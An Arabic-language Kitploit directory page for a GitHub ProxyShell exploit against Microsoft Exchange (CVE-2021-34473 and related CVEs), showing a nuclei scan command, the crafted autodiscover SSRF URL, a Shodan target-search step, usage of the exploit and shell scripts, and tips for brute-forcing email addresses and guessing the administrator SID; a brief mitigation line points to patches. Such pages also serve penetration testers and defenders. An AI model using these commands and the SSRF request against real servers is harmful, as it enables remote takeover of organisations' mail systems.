Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ProxyShell — CVE-2021-34473 ثغرة تنفيذ التعليمات البرمجية عن بُعد في Microsoft Exchange Server | Kitploit
أدوات/GitHubGitHub/kh4sh3i/proxyshell
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubkh4sh3i/proxyshell

ProxyShell

CVE-2021-34473 ثغرة تنفيذ التعليمات البرمجية عن بُعد في Microsoft Exchange Server

عرض المستودع
4161منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ProxyShell (CVE-2021-34473)

CVE-2021-34473 ثغرة تنفيذ التعليمات البرمجية عن بُعد في خادم Microsoft Exchange. تسمح لنا عملية تطبيع عناوين URL المعيبة هذه بالوصول إلى عنوان URL خلفي عشوائي أثناء التشغيل بحساب جهاز خادم Exchange. وعلى الرغم من أن هذه الثغرة ليست بقوة SSRF في ProxyLogon، وأننا نستطيع التعامل مع جزء المسار فقط من عنوان URL، إلا أنها لا تزال قوية بما يكفي لتنفيذ هجمات إضافية مع وصول خلفي عشوائي.

  • CVE-2021-34523 - ارتقاء صلاحيات الواجهة الخلفية لـ PowerShell في Exchange
  • CVE-2021-31207 - كتابة ملفات عشوائية بعد المصادقة

Scanner

ماسح nuclei لثغرة Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207) التي اكتشفها orange tsai في Pwn2Own، والتي تؤثر على خادم Microsoft Exchange.

root@kitploit:~
nuclei -u target.com -t proxyshell.yaml
root@kitploit:~
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]

هدف shodan

root@kitploit:~
sudo python3 shodan-query.py

الاستخدام

root@kitploit:~
sudo python3 ProxyShell.py -u https://<IP>

الميزات

  • لا يلزم توفير عنوان بريد إلكتروني
  • يحاول تعداد عناوين البريد الإلكتروني من Active Directory
  • يحاول تعداد LegacyDNs من Active Directory
  • يحاول اكتشاف LegacyDNs من رسائل البريد الإلكتروني المضمنة
  • يحاول اكتشاف SID لخادم Exchange في بيئات موازنة التحميل
  • يتعامل مع الاستغلال في بيئات موازنة التحميل

اختبار اختراق يدوي

root@kitploit:~
 python2 /manual/check.py 
 sudo python3 /manual/proxyshell.py
 python2 /manual/shell.py 

نصائح:

  • استكشف الهدف للعثور على عنوان بريد إلكتروني صالح
  • إذا لم تجد أي بريد إلكتروني، استخدم القوة العمياء على الهدف باستخدام ملف البريد الإلكتروني الخاص بك.
  • في بعض الأهداف، لا يعمل الاستغلال الآلي، يجب عليك تخمين SID واستبداله في SID=500

التخفيف

طبّق التحديثات الأمنية الموجودة هنا: CVE-2021-34473

المراجع

  • proxylogon orange
  • proxylogon orange 2
  • python2
تنزيل الأداة